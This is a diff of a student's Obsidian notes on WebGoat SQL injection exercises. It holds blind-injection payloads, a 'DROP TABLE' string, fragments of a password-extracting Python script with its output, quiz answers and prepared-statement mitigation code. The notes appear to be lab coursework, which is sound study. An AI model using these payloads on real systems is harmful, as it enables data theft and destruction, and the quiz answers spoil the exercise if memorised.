vault backup: 2023-04-17 14:37:32

.obsidian/workspace.json

@@ -6,7 +6,7 @@
       {
         "id": "08ad9b53ade42d31",
         "type": "tabs",
-        "dimension": 45.31147540983606,
+        "dimension": 62.59025270758123,
         "children": [
           {
             "id": "e2194e3299515374",
@@ -25,7 +25,7 @@
       {
         "id": "47553fa673bb1eb6",
         "type": "tabs",
-        "dimension": 54.68852459016394,
+        "dimension": 37.40974729241877,
         "children": [
           {
             "id": "20668ba691cd80b3",
@@ -202,8 +202,9 @@
       "juggl:Juggl global graph": false
     }
   },
-  "active": "e2194e3299515374",
+  "active": "b8336cb3c3d06be9",
   "lastOpenFiles": [
+    "Informationssicherheit/Ueb2/2023-04-17_14-16.png",
     "Untitled 1.md",
     "Untitled.md",
     "Informationssicherheit/Ueb2/Ueb2.md",

Informationssicherheit/Ueb2/Ueb2.md

@@ -97,6 +97,8 @@ Smith'; DROP TABLE access_log; --
 ### 2 
 
 - `tom' AND '1'='1` is vergeben
+	- Es gibt eine if-Abfrage, ob der Name vergeben ist
+	- Man kann diese mit AND beeinflussen
 - `tom' AND substring(password,1,1)='t` kann buchstaben des Passworts herrausfinden
 	- "Username taken" bedeutet, dass der Buchstabe richig ist
 - Durch testen: thisisasecretfortomonly
@@ -112,7 +114,7 @@ def sql_injection_advance_5():
      password = ''  
   
      headers = {  
-        'Cookie': COOKIE,  
+        'Cookie': 'JSESSIONID=8f8OmDA8QEB8JwmEJtPbWkvVtAM_2AerEHJoWYFT',  
      }  
   
      while True:  
@@ -125,7 +127,7 @@ def sql_injection_advance_5():
              'confirm_password_reg': 'a'  
          }  
   
-         r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)  
+         r = requests.put('http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)  
   
          try:  
              response = json.loads(r.text)  
@@ -144,7 +146,71 @@ def sql_injection_advance_5():
              password_index += 1  
   
 sql_injection_advance_5()
+
 ```
 
 
 
+Output:
+t
+th
+thi
+this
+thisi
+thisis
+thisisa
+thisisas
+thisisase
+thisisasec
+thisisasecr
+thisisasecre
+thisisasecret
+thisisasecretf
+thisisasecretfo
+thisisasecretfor
+thisisasecretfort
+thisisasecretforto
+thisisasecretfortom
+thisisasecretfortomo
+thisisasecretfortomon
+thisisasecretfortomonl
+thisisasecretfortomonly
+
+### 3
+1. What is the difference between a prepared statement and a statement?
+	- Solution 4: A statement has got values instead of a prepared statement
+2. Which one of the following characters is a placeholder for variables?
+	- Solution 3: ?
+3. How can prepared statements be faster than statements?
+	- Solution 2: Prepared statements are compiled once by the database management system waiting for input and are pre-compiled this way.
+4. How can a prepared statement prevent SQL-Injection?
+	- Solution 3: Placeholders can prevent that the users input gets attached to the SQL query resulting in a seperation of code and data.
+5. What happens if a person with malicious intent writes into a register form :Robert); DROP TABLE Students;-- that has a prepared statement?
+	 - Solution 4: The database registers 'Robert' ); DROP TABLE Students;--'.
+
+## Mitigation
+
+### 1 
+- getConnection
+- PreparedStatement
+- prepareStatement
+- ?
+- ? 
+- setString
+- setString
+
+![[2023-04-17_14-16.png]]
+
+### 2
+``` java
+try {  
+     Connection conn = DriverManager.getConnection(DBURL, DBUSER, DBPW);  
+     PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE name = ?");  
+     ps.setString(1, "Admin");  
+     ps.executeUpdate();  
+} catch (Exception e) {  
+     System.out.println("Oops. Something went wrong!");  
+}
+```
+
+### 3